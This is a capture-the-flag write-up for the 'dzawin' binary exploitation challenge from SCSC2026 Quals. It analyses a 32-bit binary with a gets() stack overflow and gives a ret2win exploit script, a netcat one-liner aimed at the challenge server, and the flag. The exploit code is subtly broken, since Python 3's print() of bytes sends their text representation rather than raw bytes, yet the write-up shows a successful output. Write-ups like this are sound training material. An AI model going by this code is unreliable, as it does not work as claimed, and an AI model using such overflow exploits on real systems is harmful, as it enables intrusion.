SCSC2026 Quals - dzawin - Binary Exploitation Writeup

Category: Binary Exploitation
Server: nc 43.128.69.211 13005
Flag: scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}

Challenge Description#

Classic buffer overflow with a win function.

Binary Analysis#

$ file stack
stack: ELF 32-bit LSB executable, Intel 80386, dynamically linked, not stripped

$ checksec --file=stack
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Key Functions#

win() @ 0x080491c2

void win() {
    FILE *fp = fopen("flag.txt", "r");
    if (!fp) {
        perror("Error while opening the file.");
        exit(1);
    }
    int c;
    while ((c = fgetc(fp)) != EOF) {
        putchar(c);
    }
}

vuln() @ 0x0804921f

vuln:
    push   ebp
    mov    ebp, esp
    sub    esp, 0x80              ; 128-byte buffer
    lea    eax, [ebp-0x80]        ; buffer address
    push   eax
    call   gets                   ; VULNERABLE!
    leave
    ret

Stack Layout#

[    128 bytes buffer    ] <- ebp-0x80 (gets writes here)
[   4 bytes saved EBP    ] <- ebp
[  4 bytes return addr   ] <- ebp+4 (overwrite target)

Exploitation Strategy#

Fill 128-byte buffer with padding
Overwrite 4-byte saved EBP with junk
Overwrite return address with win() address (0x080491c2)

Total padding needed: 128 + 4 = 132 bytes

Exploit#

#!/usr/bin/env python3
import struct

padding = b'A' * 132  # 128 buffer + 4 saved ebp
win_addr = struct.pack('<I', 0x080491c2)  # little-endian

payload = padding + win_addr
print(payload)

One-liner:

python3 -c "import struct; print(b'A'*132 + struct.pack('<I', 0x080491c2))" | nc 43.128.69.211 13005

Output#

scsc26{r3t2wIn_f0r_fUn_4nD_pr0ViT}